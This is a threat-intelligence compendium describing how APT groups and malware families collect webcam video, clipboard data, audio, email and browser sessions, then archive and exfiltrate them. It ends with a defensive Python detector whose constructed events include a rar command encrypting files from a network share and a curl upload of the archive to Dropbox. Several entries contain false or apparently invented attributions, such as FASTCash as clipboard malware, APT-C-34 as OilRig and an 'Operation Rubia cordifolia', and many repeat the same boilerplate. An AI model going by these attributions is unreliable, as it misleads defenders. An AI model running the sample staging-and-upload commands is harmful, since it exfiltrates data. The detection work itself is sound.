  • Lazarus Group: A North Korean state-sponsored group known for using video capture to enhance their surveillance and intelligence gathering. They deploy malware like "KimJongRAT" which includes the capability to activate the victim’s webcam and record video. The malware records video when triggered by specific user actions or schedules, capturing footage of the victim’s activities and surroundings. These video files are encrypted and stored on the victim’s system to avoid detection by security software. Lazarus Group then exfiltrates the videos to their remote servers using secure communication channels. This technique allows them to gather detailed visual intelligence and monitor high-value targets more effectively.

  • APT10 (Stone Panda): A Chinese state-sponsored group that uses video capture as part of their comprehensive data collection strategy. They utilize malware like "QuasarRAT" which can remotely activate and record from the victim’s webcam. The malware captures video when specific conditions are detected, such as user login or access to sensitive applications. The video recordings are encrypted and stored in concealed directories on the infected system. APT10 periodically transfers these video files to their command and control infrastructure via secure, encrypted channels. This method helps them obtain real-time visual insights into the victim’s environment and activities, complementing other collected data for a fuller intelligence picture.

  • DarkHotel: A cyber-espionage group targeting business executives and government officials, known for using video capture to gather intelligence. They employ malware like "Inexsmar" which includes functionality to covertly record video from the victim’s webcam. The malware is triggered by specific actions or schedules, capturing video of the victim’s activities and surroundings. The recorded video files are encrypted and stored locally in hidden directories to prevent detection. DarkHotel then exfiltrates these files to their remote servers using secure methods. Video capture provides them with valuable visual context and helps in monitoring the behavior and interactions of their high-profile targets.

Clipboard Data

  • APT28 (Fancy Bear): A Russian state-sponsored cyber-espionage group known for targeting government and military organizations. They use malware like "X-Agent" which includes a clipboard monitoring module that captures data copied to the clipboard. This feature activates automatically and records clipboard content such as copied text, images, and documents, particularly focusing on credentials, personal information, and sensitive communications. The collected clipboard data is encrypted and stored locally to avoid detection. APT28 periodically exfiltrates the stored data to their command and control servers via encrypted communication channels. This method allows them to gather sensitive information that users may temporarily store in the clipboard, providing valuable insights and access to restricted data.

  • Lazarus Group: A North Korean state-sponsored group involved in both cyber-espionage and financial theft. They deploy malware like "FASTCash" which includes clipboard monitoring capabilities. The malware captures any data copied to the clipboard, including financial information, login credentials, and personal details. This clipboard data is encrypted and stored in hidden directories on the victim's system. Lazarus Group schedules regular exfiltration of this data to their remote servers using secure channels. By capturing clipboard data, they can intercept sensitive information that might be used for further exploitation or financial gain.

  • Turla (Snake): A Russian cyber-espionage group known for its sophisticated data collection techniques. They use malware like "Carbon" and "Kazuar" which include modules to monitor and capture clipboard content. The malware records all data copied to the clipboard, focusing on capturing sensitive information such as passwords, personal identification information, and corporate data. The collected clipboard data is encrypted and stored locally before being exfiltrated to Turla's command and control servers. This technique allows Turla to gather valuable intelligence from the clipboard, which users may use to temporarily store sensitive information during their work activities.

  • APT32 (OceanLotus): A Vietnamese state-sponsored group that targets government and private sector organizations. They use malware like "KerrDown" which includes clipboard monitoring features. The malware captures clipboard data, including text, images, and documents, whenever users copy information. This data is encrypted and stored in concealed directories on the victim's machine. APT32 periodically exfiltrates the clipboard data to their command and control infrastructure using secure communication methods. By monitoring clipboard activity, APT32 can capture transient, sensitive information that may not be stored permanently on the system, enhancing their data collection efforts.

  • FIN7 (Carbanak): A financially motivated cybercrime group that uses clipboard monitoring to steal sensitive financial information. They employ malware like "Carbanak" which includes a module to capture clipboard content. The malware records data copied to the clipboard, focusing on payment card details, banking information, and financial transaction records. The collected data is encrypted and stored locally before being transmitted to FIN7's command and control servers using secure channels. This method allows FIN7 to intercept and collect valuable financial information that can be used for fraudulent activities and financial gain.

  • APT10 (Stone Panda): A Chinese state-sponsored group engaged in extensive cyber-espionage activities. They use malware like "QuasarRAT" which includes clipboard monitoring functionalities. The malware captures all data copied to the clipboard, including sensitive corporate information, credentials, and personal data. This clipboard data is encrypted and stored in hidden directories on the compromised system. APT10 schedules regular data exfiltration to transfer the clipboard data to their remote servers using encrypted communication channels. By capturing clipboard data, APT10 can gather a wide range of sensitive information that users might not permanently save on their systems, enhancing their espionage capabilities.

Archive Collected Data: Archive via Custom Method

  • APT29 (Cozy Bear): A Russian state-sponsored cyber-espionage group known for its sophisticated data collection and archiving methods. APT29 uses custom-developed scripts and tools to collect and compress sensitive data into encrypted archives. Their malware, such as "WellMess" and "WellMail," includes functionalities to search for specific file types and compile them into encrypted archive files. These archives are created using customized encryption algorithms, tailored to bypass conventional detection methods. The archives are then stored in hidden directories on the victim's system or immediately exfiltrated to their command and control servers. By employing custom archiving techniques, APT29 ensures that the collected data is secure and obfuscated, reducing the risk of detection during both the collection and exfiltration phases.

  • Turla (Snake): This Russian cyber-espionage group uses custom methods to archive collected data, ensuring secure and stealthy exfiltration. Turla’s malware, like "Carbon" and "Kazuar," includes specialized modules for aggregating and compressing collected data into encrypted archive files. They employ unique encryption schemes and compression algorithms to protect the data and evade detection by traditional security tools. These custom archives are stored in hidden or system directories, making them difficult to detect. Turla then exfiltrates the archives using encrypted communication channels, often embedding the data in legitimate traffic to avoid raising alarms. This sophisticated archiving process allows Turla to efficiently manage and secure large volumes of sensitive information.

  • APT10 (Stone Panda): A Chinese state-sponsored group that utilizes custom archiving methods to manage and secure collected data. APT10 employs tools like "RedLeaves" which include functionalities to gather, compress, and encrypt data using proprietary methods. The collected data is archived into custom encrypted files, often using bespoke encryption keys and algorithms to enhance security. These archives are stored in obscure directories on the victim’s system to evade detection. APT10 schedules regular intervals to transfer these archives to their command and control servers using encrypted channels. Custom archiving ensures that the data is both protected from unauthorized access and obfuscated from security mechanisms, facilitating smooth exfiltration.

  • FIN7 (Carbanak): This financially motivated cybercrime group uses custom methods to archive stolen data, optimizing it for secure exfiltration. FIN7's malware, such as "GratefulPOS," includes custom scripts to compress and encrypt collected financial data into proprietary archive formats. These archives are created using unique compression and encryption techniques designed to avoid detection by security systems. The archives are stored in system directories or other inconspicuous locations within the victim's network. FIN7 then uses encrypted communication channels to transfer the data to their remote servers. This custom approach allows them to efficiently manage large volumes of sensitive financial information while maintaining a low profile.

  • Lazarus Group: A North Korean state-sponsored group known for using custom archiving methods to handle collected data. Lazarus Group’s malware, including "Hermes" and "RATs," features modules to collect, compress, and encrypt data using tailored algorithms. These archives are created with proprietary encryption schemes, enhancing data security and obfuscation. The archived data is stored in hidden directories, ensuring it remains undetected by standard security tools. Lazarus Group schedules the transfer of these archives to their command and control servers through encrypted channels. The use of custom methods ensures that the data is protected during collection and exfiltration, supporting their espionage and financial theft operations.

  • DarkHotel: A cyber-espionage group targeting business executives and government officials, using custom archiving methods for data collection. Their malware, such as "Inexsmar," includes functionalities to collect and compress data into encrypted archives using proprietary techniques. These custom archives are created with specialized encryption keys and algorithms, ensuring the data is secure and obfuscated. The archives are stored in concealed directories on the victim’s system to evade detection. DarkHotel uses secure, often encrypted, communication channels to transfer the archived data to their remote servers. This method allows them to efficiently manage and protect collected information, facilitating stealthy and secure data exfiltration.

Audio Capture

  • Nazar: Nazar is a lesser-known malware associated with the Equation Group, primarily known for using open-source tools. The malware records audio through the LAME MP3 encoding library by loading the lame_enc.dll file, which captures audio from the infected system's microphone. This file is part of a modular suite where different functionalities, including audio recording, are executed based on commands received from the attackers. Communication is managed using a packet sniffer to handle UDP packets, enabling the malware to listen for instructions to start audio recording. Once activated, it captures and sends audio data back to the command and control (C2) server. The recording capabilities are controlled remotely, ensuring that the attackers can initiate and terminate recording sessions as needed. This modular and flexible approach allows Nazar to adapt its functionality according to the operational needs of the attackers.

  • EvilGnome: EvilGnome targets Linux desktop users, a rarity among malware, and records audio using the ShooterSound module. This module utilizes PulseAudio to capture audio from the user’s microphone. The captured audio is then uploaded to the C2 server. The deployment involves a self-extracting archive (SFX) which installs the spyware executable in a directory mimicking a Gnome shell extension. Persistence is maintained through a script registered to run every minute via the system's crontab scheduler. Each module of EvilGnome operates in its own thread, ensuring continuous operation and data capture. The use of encryption (RC5) for communication with the C2 server ensures that the data exfiltrated remains secure and undetected.

  • Attor: Attor is a sophisticated espionage platform known for its advanced modular design, including an audio capture plugin. This plugin records audio using GSM fingerprinting techniques, targeting connected devices like phones. Attor uses AT commands to interact with GSM devices, allowing it to capture audio and other information. The recorded audio data is encrypted and staged for exfiltration to the C2 server via FTP. Attor’s modularity allows for the audio capture functionality to be dynamically loaded and activated based on specific commands received from the attackers, enhancing its stealth and operational flexibility. The use of the Tor network for C2 communication further anonymizes and secures the data exfiltration process.

  • TajMahal: TajMahal is an extensive and highly sophisticated APT framework used for cyber espionage. One of its many plugins is designed to record audio from the victim’s microphone. The malware suite is modular, with the audio recording module capturing voice inputs and other sound data, which are then exfiltrated to the C2 server. This framework is capable of reinstallation and injection into running processes, ensuring persistent and covert surveillance. The audio capture capability is part of a broader espionage toolkit that also includes screen capture, keylogging, and file indexing, making TajMahal a versatile and powerful tool for intelligence gathering.

  • LightNeuron: LightNeuron is a sophisticated tool used by the Turla group, embedded in Microsoft Exchange servers to execute various espionage tasks, including audio capture. The malware uses email-based C2 communication, embedding commands in image files attached to emails. LightNeuron can be configured to record audio from the infected system and exfiltrate this data through the same email-based channels, utilizing steganography to hide the commands and data within seemingly benign email attachments. This method allows LightNeuron to operate undetected by traditional network security tools, making its audio capture capability both covert and effective.

  • FinSpy: FinSpy is a commercial spyware used for targeted surveillance, capable of recording audio on various platforms including Windows, MacOS, Linux, and Android. The spyware employs a modular architecture, with specific plugins dedicated to capturing audio from the device's microphone. These audio recordings are encrypted and transmitted to the C2 server. FinSpy's distribution methods include phishing and malicious document attachments, ensuring wide reach and effective infection. The spyware's ability to obfuscate its operations using techniques like LLVM-obfuscator and encrypted payloads makes its audio capture capabilities particularly stealthy and difficult to detect.

Data from Removable Media

  • Machete: Machete is a cyber espionage group primarily targeting military organizations in Latin America, particularly the Venezuelan military. Their malware automatically copies files from newly inserted removable drives to the infected system. This technique involves the malware scanning for connected USB drives and copying all files to a designated folder on the victim’s computer. These files are then encrypted and prepared for exfiltration. The group uses both automated and manual methods to collect and sort the data from these drives. This ensures they can gather a wide array of sensitive information from targeted systems without immediate detection. The exfiltrated data includes documents, images, and other file types of interest.

  • Operation Rubia cordifolia (Poison Ivy APT): Poison Ivy is known for its use of social engineering and sophisticated phishing frameworks to target various sectors. Their campaigns involve inserting malicious code into removable media, which activates when the media is connected to a computer. The malware then automatically collects data from the connected device, including sensitive files and system information. This data is encrypted and sent to the attackers' command and control servers. By leveraging removable media, they can bypass network security measures and directly infect isolated or highly secured systems. This method of data collection allows the attackers to extract valuable information without needing continuous network access.

  • UNC2596 (Cuba Ransomware): UNC2596 is a ransomware group that also engages in data exfiltration before encrypting victims' files. They deploy malware that scans for connected removable drives and copies valuable data from them. This technique ensures that sensitive information is extracted and stored for potential use or sale before the ransomware encrypts the data on the main system. The malware operates silently in the background, transferring files to a designated staging area before uploading them to the attackers' servers. This dual approach of data theft and ransomware ensures maximum financial gain from their operations.

  • APT-C-34 (Iranian Espionage Group): APT-C-34, also known as OilRig, targets various sectors, including telecommunications and energy. They utilize custom-developed malware that activates when a removable drive is connected to an infected machine. The malware scans the drive for files matching specific criteria, such as file types or keywords, and then copies these files to a hidden directory on the system. This data is then encrypted and exfiltrated to the attackers' command and control infrastructure. By targeting removable media, APT-C-34 can obtain sensitive data from air-gapped or otherwise isolated systems that are not connected to the internet.

  • APT41: APT41 is a Chinese cyber espionage group that uses a wide range of malware to gather intelligence. One of their techniques involves deploying malware that activates upon the insertion of a removable drive. This malware automatically copies files from the drive, focusing on documents and other sensitive information. The copied files are stored in an encrypted format on the infected system, ready for exfiltration at a later stage. This method allows APT41 to gather significant amounts of data from compromised networks, especially in environments where internet connectivity is limited or heavily monitored.

  • ATMitch (Carbanak/GCMAN): ATMitch is malware used by the Carbanak and GCMAN groups to target ATMs and banking systems. The malware is designed to interact with the removable drives used to update ATM software. When an infected removable drive is connected, the malware automatically copies sensitive configuration files and logs from the ATM system. These files are then encrypted and transferred to the attackers. By targeting removable media, ATMitch ensures that it can capture data from isolated ATM systems that do not have direct network connections to external systems, making it a potent tool for financial cybercrime.

Email Collection: Remote Email Collection

  • UNC3524: UNC3524 is a sophisticated cyber-espionage group known for targeting high-value individuals and organizations. They utilize Exchange Web Services (EWS) API requests to remotely collect email data. This method involves making structured API requests to extract emails and attachments from targeted Exchange servers. They authenticate using various credentials, including compromised accounts and ApplicationImpersonation rights, which allow them to access mailboxes without detection. The collected data is specifically chosen from executive teams and employees involved in significant corporate activities, often spanning specific date ranges. UNC3524 operates from devices often overlooked in security monitoring, such as older Linux versions and network appliances. This advanced operational security ensures that their activities blend in with expected network traffic, avoiding detection.

  • APT29: APT29, also known as Cozy Bear, is a Russian cyber-espionage group linked to high-profile attacks. They have been known to deploy phishing campaigns to compromise email accounts, subsequently using the compromised accounts to collect email data remotely. For example, they have used phishing emails masquerading as official communications from the U.S. Department of State. These emails contain links to malicious files that deliver backdoors like the Cobalt Strike Beacon. Once the backdoor is installed, it provides remote access to the compromised systems, allowing APT29 to collect and exfiltrate email data. Their phishing emails often exploit compromised infrastructure, such as hijacked email servers, to make the attacks appear legitimate.

  • APT10: APT10, a Chinese state-sponsored group, has conducted extensive cyber-espionage campaigns targeting various sectors worldwide. They utilize the A41APT campaign to exploit vulnerabilities in Pulse Connect Secure, gaining access to VPN sessions and leveraging stolen credentials. Once inside, they employ the Ecipekac loader to deliver multiple stages of malware. These stages include tools that can access email servers and extract email data remotely. APT10's multi-layered approach involves decrypting and executing payloads in memory, which allows them to remain undetected while accessing sensitive email communications from targeted organizations.

  • APT35: APT35, also known as Charming Kitten, is an Iranian cyber-espionage group that frequently targets individuals in academia, human rights, and media. They use spear-phishing emails to gain initial access to victims' email accounts. These emails often impersonate well-known researchers or journalists, inviting recipients to events or to review documents. Upon clicking the links, victims are redirected to decoy websites that harvest their credentials. The collected email credentials are then used to remotely access and download email data from the victims' accounts, facilitating espionage activities. This method allows APT35 to gather intelligence and sensitive information without raising immediate suspicion.

  • TA410: TA410 is an advanced threat group targeting the U.S. utilities sector using sophisticated phishing tactics. Their campaigns, such as those involving LookBack and FlowCloud malware, begin with phishing emails that appear legitimate, often impersonating reputable organizations. The emails contain malicious attachments that, when opened, deliver malware capable of remote access. This access is used to collect email data from the targeted systems, including communications and attachments. The malware features a modular architecture, enabling various functionalities like keylogging and data exfiltration, ensuring comprehensive email collection and espionage capabilities.

  • APT34: APT34, an Iranian cyber-espionage group, uses social engineering and phishing to compromise targets' email accounts. They deliver malware through spear-phishing emails and social media platforms, often engaging in conversations to lure targets into downloading malicious documents. Once the targets' email accounts are compromised, APT34 deploys tools like TONEDEAF and LONGWATCH to collect email data remotely. These tools extract system information and login credentials, allowing the group to access and exfiltrate email communications from the compromised accounts. APT34's use of trusted relationships and sophisticated malware ensures effective and covert email collection.

Browser Session Hijacking

  • Turla (Snake): Turla, also known as Snake, is a Russian cyber-espionage group known for targeting government and military organizations. They have developed a sophisticated browser session hijacking technique to intercept and manipulate web sessions. Turla's malware injects itself into the browser process, allowing it to capture cookies and session tokens. This enables the attackers to hijack active sessions without needing the user's credentials. The malware operates stealthily by using encrypted communication channels to send the captured data to the command and control (C2) servers. By maintaining access to these sessions, Turla can continuously monitor and exfiltrate sensitive information from the target's browser activity. This method is highly effective in bypassing traditional security measures and maintaining long-term access to compromised systems.

  • APT28 (Fancy Bear): APT28, also known as Fancy Bear, is another Russian state-sponsored group that has used browser session hijacking to gather intelligence. Their malware toolkit includes capabilities to hook into browser processes and capture session cookies and authentication tokens. This allows them to hijack sessions on platforms like webmail and social media. The malware also intercepts SSL/TLS traffic, giving attackers access to encrypted communications. APT28 leverages these capabilities to perform man-in-the-middle attacks, redirecting traffic through their own servers to capture sensitive data. This technique helps them to remain undetected while exfiltrating valuable information over extended periods.

  • APT33: APT33, an Iranian threat group, has targeted various industries using browser session hijacking techniques. They deploy malware that hooks into the browser and captures session cookies and tokens. This allows them to gain access to authenticated web sessions, bypassing the need for login credentials. The captured data is then used to perform further attacks, such as stealing information from web-based email services or enterprise applications. The malware also includes mechanisms to avoid detection, such as encrypted communication with C2 servers and hiding its presence on the infected system. This persistent access enables APT33 to conduct prolonged espionage campaigns.

  • FIN7 (Carbanak Group): FIN7, also known as the Carbanak Group, has incorporated browser session hijacking into their arsenal to facilitate financial theft and corporate espionage. Their malware hooks into web browsers to capture session tokens and cookies, which are then used to hijack online banking sessions. This enables FIN7 to conduct fraudulent transactions without triggering security alerts that typically require re-authentication. The group also uses this technique to access and exfiltrate sensitive corporate data from web-based applications. Their sophisticated malware includes features for evading detection, such as encrypting traffic and using legitimate software for payload delivery.

  • APT41: APT41, a Chinese cyber-espionage group, has used browser session hijacking to gather intelligence and steal data. They deploy malware that integrates with browser processes to capture session tokens and cookies, allowing them to take over authenticated sessions. This technique is used to access email accounts, social media platforms, and enterprise applications. APT41's malware also includes capabilities to intercept and decrypt SSL/TLS traffic, providing access to secure communications. The group uses these hijacked sessions to conduct targeted attacks, exfiltrating valuable data and monitoring ongoing communications.

  • OceanLotus (APT32): OceanLotus, also known as APT32, is a Vietnamese cyber-espionage group that has utilized browser session hijacking to target foreign governments and corporations. Their malware hooks into browser processes to capture session tokens and cookies, which are then used to hijack web sessions. This allows them to gain access to email accounts, social media, and other web-based services without needing the user's credentials. The captured session data is transmitted to their C2 servers using encrypted channels, ensuring stealthy communication. OceanLotus leverages this access to conduct espionage operations, collecting sensitive information over extended periods.

Archive Collected Data: Archive via Library

  • Turla (Snake): Turla, also known as Snake, is a Russian cyber-espionage group targeting government and military organizations. They have used the Crutch backdoor to exfiltrate data by archiving collected data using the WinRAR utility. The malware automatically compresses targeted files into encrypted RAR archives. These archives are then uploaded to Dropbox, leveraging legitimate cloud storage services for data exfiltration. The use of Dropbox not only ensures reliable file transfer but also helps in evading traditional network monitoring tools. Crutch persists on the system through DLL hijacking, making it difficult to detect. This method allows Turla to maintain long-term access and control over compromised systems while securely exfiltrating sensitive data.

  • APT28 (Fancy Bear): APT28, also known as Fancy Bear, is a Russian cyber-espionage group that has targeted various sectors, including government and military organizations. They have utilized the Sofacy malware to collect and archive data. The malware uses the 7-Zip library to compress collected files into encrypted archives. These archives are then staged for exfiltration via various protocols, including FTP and HTTP. The use of the 7-Zip library allows for the compression and encryption of data, which aids in reducing the file size and securing the contents. This technique helps APT28 in efficiently managing large volumes of data and ensuring that the exfiltrated information remains protected during transit.

  • Lazarus Group: The Lazarus Group, linked to North Korea, is known for its diverse cyber-espionage and financial crime activities. They employ the AppleJeus malware to collect data from compromised cryptocurrency exchanges. The malware uses a custom archiving library to compress collected data into encrypted archives. These archives are then exfiltrated to command and control (C2) servers. The use of custom archiving ensures that the data is securely packaged and reduces the risk of detection during transfer. This method allows the Lazarus Group to efficiently steal large volumes of sensitive financial information from their targets.

  • FIN6 (Magecart Group 6): FIN6, associated with Magecart, targets e-commerce platforms to steal credit card information. They use JavaScript skimmers to collect payment data, which is then archived using custom libraries within the malicious script. The skimmer code compresses the stolen data and encrypts it before exfiltration. This approach ensures that the captured data is secure and less likely to be detected by security measures. The archived data is then sent to remote servers controlled by FIN6, where it can be decrypted and used for fraudulent activities. This method highlights FIN6's focus on maintaining the confidentiality and integrity of the stolen data during the exfiltration process.

  • APT32 (OceanLotus): OceanLotus, a Vietnamese cyber-espionage group, targets government agencies and private sector organizations. They utilize a backdoor that collects sensitive data and archives it using a custom compression library. The archived data is encrypted and stored in a hidden directory on the infected system. Periodically, the malware exfiltrates these encrypted archives to C2 servers via HTTPS. The use of a custom compression library and encryption ensures that the data remains secure and compressed, facilitating efficient and stealthy exfiltration. This technique allows APT32 to conduct long-term espionage operations while minimizing the risk of data interception.

  • APT41: APT41, a Chinese state-sponsored group, conducts both cyber-espionage and financially motivated attacks. They employ the ShadowPad malware, which includes a module for archiving collected data. ShadowPad compresses and encrypts the data using the zlib library before exfiltration. The use of zlib allows for efficient compression, reducing the size of the data and making it easier to transfer. The encrypted archives are then sent to C2 servers over secure channels, such as HTTPS. This method ensures that the exfiltrated data remains secure and less detectable during transmission, enabling APT41 to conduct extensive data theft operations.

Data from Network Shared Drive

  • Turla (Snake): Turla, also known as Snake, is a Russian cyber-espionage group targeting government and military organizations. They use the Crutch backdoor to exfiltrate data, which involves accessing network shared drives to collect sensitive documents. The Crutch malware scans these drives for valuable files, copying them to a local staging area on the compromised system. The collected data is then archived using WinRAR, creating encrypted files that are exfiltrated to Dropbox. This technique allows Turla to leverage legitimate cloud storage services to move large volumes of data out of secure networks. By hiding within normal network traffic and using standard tools like WinRAR, Turla's activities often evade detection. The collected data includes documents, images, and other critical information needed for their espionage operations .

  • APT10 (Stone Panda): APT10, also known as Stone Panda, is a Chinese cyber-espionage group that targets various sectors, including technology and government. It accesses and exfiltrates data from network shared drives using tools such as Trochilus and UPPERCUT. These tools list directories on network shares, identify files of interest, and copy them off. The collected data is compressed with WinRAR and pushed to command and control (C2) servers with cURL. Both are legitimate binaries, so defenders cannot rely on a malware hash; the signal is the context: an archiver reading UNC paths, followed shortly by cURL uploading the resulting archive. Standard protocols and legitimate tools let APT10 blend into normal network traffic and keep a low profile during its operations.

  • APT29 (Cozy Bear): APT29, also known as Cozy Bear, is a Russian state-sponsored group that has targeted government and private sector organizations. Its malware accesses network shared drives and collects files matching specific criteria, such as document types and file sizes. Matching files are copied to a staging area, compressed and encrypted with tools like 7-Zip or WinRAR, and the archives are exfiltrated to servers under the attackers' control. This lets APT29 take significant amounts of data while maintaining a covert presence on the network. Encrypting the archives prevents content inspection of the data in transit, so what remains for defenders are size and behaviour indicators: large archives created under user accounts, and bursts of outbound traffic that follow them.

  • Lazarus Group: Lazarus Group, linked to North Korea, targets various industries including finance and media. Its malware accesses network shared drives and lists directories to identify valuable files. The files are staged and compressed into encrypted archives with WinRAR or custom compression tools, then exfiltrated over HTTP or HTTPS to compromised legitimate websites serving as C2 servers. This lets Lazarus move large volumes of data out of secure environments while minimizing the risk of detection: the destinations are established sites with good reputation, so domain-reputation and category filters do not block the transfer, and the exfiltration is difficult for defenders to identify and block.

  • FIN7 (Carbanak Group): FIN7, also known as the Carbanak Group, is a financially motivated cybercrime organization that targets retail, hospitality, and financial sectors. It accesses network shared drives to collect payment card data and other financial information. The collected data is compressed with 7-Zip or similar utilities and encrypted before exfiltration; FIN7 often uses custom scripts to automate collection and compression so the process is fast and repeatable across many hosts. The encrypted archives are transferred to servers the group controls, typically over legitimate communication channels to avoid detection. This lets FIN7 steal large amounts of sensitive financial data while staying below the thresholds of standard security controls.

  • APT32 (OceanLotus): APT32, also known as OceanLotus, is a Vietnamese cyber-espionage group targeting government and private sector organizations. Its malware accesses network shared drives and searches for files containing sensitive information. Identified files are copied, compressed with tools like WinRAR, and encrypted before transit, then exfiltrated to C2 servers over HTTPS so the transfer resembles legitimate web traffic. This lets APT32 gather significant intelligence without raising immediate suspicion; encryption and standard protocols keep the exfiltrated data from being inspected and help the group maintain its covert presence on the network.
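Every entry above describes the same chain: a share is read, the files are staged and packed with an archiver, and the archive leaves through a standard tool or service. None of the binaries involved is malware, so detection has to rest on behaviour and sequence. The following Python example is added for this page and is not taken from any of the groups' tooling or from a vendor product. It runs that logic over constructed process-creation events (the pipe-delimited log format, hostnames, users, paths and the 30-minute correlation window are all invented for the example): it flags an archiver encrypting content read from a UNC path, flags cURL or wget used to send a file, and raises the severity when the archive an archiver just produced is the file uploaded shortly afterwards on the same host.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed process-creation events for the example (not real telemetry).
# Format: time|host|user|parent_image|image|command_line
SAMPLE_EVENTS = r"""
2024-03-04T09:12:01|WS-FIN-07|corp\jdoe|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe
2024-03-04T09:14:22|WS-FIN-07|corp\jdoe|C:\Windows\System32\cmd.exe|C:\Windows\System32\net.exe|net use Z: \\fileserver01\Finance /persistent:no
2024-03-04T09:15:40|WS-FIN-07|corp\jdoe|C:\Windows\System32\cmd.exe|C:\Users\jdoe\AppData\Local\Temp\rar.exe|rar.exe a -r -hpS3cr3t! C:\Users\jdoe\AppData\Local\Temp\q4.rar \\fileserver01\Finance\Budget\*.xlsx
2024-03-04T09:16:05|WS-FIN-07|corp\jdoe|C:\Windows\System32\cmd.exe|C:\Windows\System32\curl.exe|curl.exe -k -T C:\Users\jdoe\AppData\Local\Temp\q4.rar https://content.dropboxapi.com/2/files/upload
2024-03-04T10:02:11|WS-HR-02|corp\asmith|C:\Windows\explorer.exe|C:\Program Files\7-Zip\7z.exe|7z.exe a C:\Users\asmith\Documents\photos.7z C:\Users\asmith\Pictures\*.jpg
2024-03-04T11:30:00|SRV-BUILD|corp\svc_ci|C:\Python\python.exe|C:\Windows\System32\curl.exe|curl.exe -s https://updates.example.com/manifest.json -o manifest.json
"""

ARCHIVER = re.compile(r"(?:^|\\)(?:rar|winrar|7z|7za)\.exe$", re.I)
UPLOADER = re.compile(r"(?:^|\\)(?:curl|wget)\.exe$", re.I)
# rar: -hp<pw> encrypts headers and data, -p<pw> encrypts data; 7z: -p<pw> (often with -mhe=on)
PASSWORD_SWITCH = re.compile(r"(?:^|\s)-(?:hp|p)\S*", re.I)
# \\server\share as it appears on a command line
UNC_PATH = re.compile(r"\\\\[\w.\-]+\\[\w$.\-]+")
ARCHIVE_NAME = re.compile(r"\S+\.(?:rar|7z|zip)\b", re.I)
# curl/wget switches that send a local file or body rather than fetch one (case-sensitive)
UPLOAD_SWITCH = re.compile(r"(?:^|\s)(?:-T|--upload-file|-F|--data-binary\s+@|-d\s+@|--post-file)")


@dataclass
class Event:
    time: datetime
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


@dataclass
class Finding:
    time: datetime
    host: str
    user: str
    severity: str
    rule: str
    detail: str


def parse_events(text: str) -> List[Event]:
    events = []
    for line in text.strip().splitlines():
        t, host, user, parent, image, cmdline = line.split("|", 5)
        events.append(Event(datetime.fromisoformat(t), host, user, parent, image, cmdline))
    return events


def detect(events: List[Event], window: timedelta = timedelta(minutes=30)) -> List[Finding]:
    findings: List[Finding] = []
    # archives produced by a suspicious archiver run, keyed by (host, lower-cased archive path)
    staged: Dict[Tuple[str, str], Event] = {}
    for ev in sorted(events, key=lambda e: e.time):
        if ARCHIVER.search(ev.image):
            encrypted = PASSWORD_SWITCH.search(ev.cmdline) is not None
            from_share = UNC_PATH.search(ev.cmdline)
            if not (encrypted or from_share):
                continue  # ordinary local archiving; tune with allow-lists rather than alert
            archive = ARCHIVE_NAME.search(ev.cmdline)
            if archive:
                staged[(ev.host, archive.group(0).lower())] = ev
            parts = []
            if encrypted:
                parts.append("password-protected archive")
            if from_share:
                parts.append(f"input read from network share {from_share.group(0)}")
            findings.append(Finding(ev.time, ev.host, ev.user,
                                    "high" if encrypted and from_share else "medium",
                                    "archive-collected-data", "; ".join(parts)))
        elif UPLOADER.search(ev.image) and UPLOAD_SWITCH.search(ev.cmdline):
            archive = ARCHIVE_NAME.search(ev.cmdline)
            prior = staged.get((ev.host, archive.group(0).lower())) if archive else None
            if prior is not None and ev.time - prior.time <= window:
                findings.append(Finding(ev.time, ev.host, ev.user, "critical", "stage-then-upload",
                                        f"{archive.group(0)} archived at {prior.time:%H:%M:%S} "
                                        f"then uploaded by {ev.image}"))
            else:
                findings.append(Finding(ev.time, ev.host, ev.user, "medium", "cli-upload",
                                        f"upload switch in: {ev.cmdline}"))
    return findings


if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{f.time:%H:%M:%S} {f.host} {f.user} [{f.severity}] {f.rule}: {f.detail}")
```

The two benign events (7-Zip archiving a local photo folder without a password, cURL downloading a manifest on a build server) produce nothing, which is the point of keying on the password switch, the UNC source and the upload switch rather than on the tool names alone. In production the archive-name correlation would be replaced by a file-create event for the archive, since an archiver run from a script may not name the output on its command line.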

Email Collection: Local Email Collection

  • APT33: APT33, an Iranian threat group, has been documented targeting various sectors, including aviation and energy. It deploys a backdoor known as "TurnedUp" to collect email data locally from infected systems, reading the message stores of clients such as Microsoft Outlook directly from disk rather than going through the mail server. The collected email data is compressed and encrypted before being sent to the attackers' command and control (C2) servers, so the transfer carries no readable content. Collecting locally stored email gives APT33 detailed communication records, including attachments and metadata, and generates no mailbox access logging on the server side; the evidence is on the endpoint, where a process other than the mail client opens the client's data files.

  • APT34: Also known as OilRig, APT34 is an Iranian cyber-espionage group that targets financial, energy, telecommunications, and critical infrastructure sectors. It uses a tool called "VALUEVAULT", a Go-compiled port of the Windows Vault Password Dumper, to recover stored credentials, including those for mail and webmail accounts, from the Windows Vault (Credential Manager); it also invokes PowerShell to pull browser history so that recovered passwords can be matched to the sites they belong to. The results are written to a local SQLite database file, which the operators retrieve manually rather than through automated beaconing. Recovered mail credentials then give APT34 access to the victim's mailbox and to sensitive corporate communications. The manual retrieval indicates a deliberate, controlled exfiltration step that keeps the tool's network footprint minimal.

  • APT28 (Fancy Bear): APT28, a Russian state-sponsored group, employs malware such as Sofacy and X-Agent to collect local email data from compromised systems. These families can reach into email clients such as Microsoft Outlook and Mozilla Thunderbird and extract stored messages and attachments. The malware compresses and encrypts the collected data before transmitting it to remote C2 servers. Captured mail gives APT28 valuable intelligence, particularly against government and military targets, and yields a complete communication record rather than the fragments a keylogger produces. Its methodical approach to email collection reflects a focus on long-term access and undetected data extraction.

  • APT10 (Stone Panda): APT10, a Chinese cyber-espionage group, uses tools such as "ChChes" to collect email locally from infected devices. The malware targets the email client's local stores, such as the PST files used by Microsoft Outlook; copying a PST yields the victim's complete mail archive, including attachments and metadata, in a single file. The collected data is compressed and encrypted for transmission to the attackers' C2 infrastructure. Local collection gives APT10 detailed historical communication data without touching the mail server, which is why access to PST and OST files by anything other than the mail client is worth alerting on.

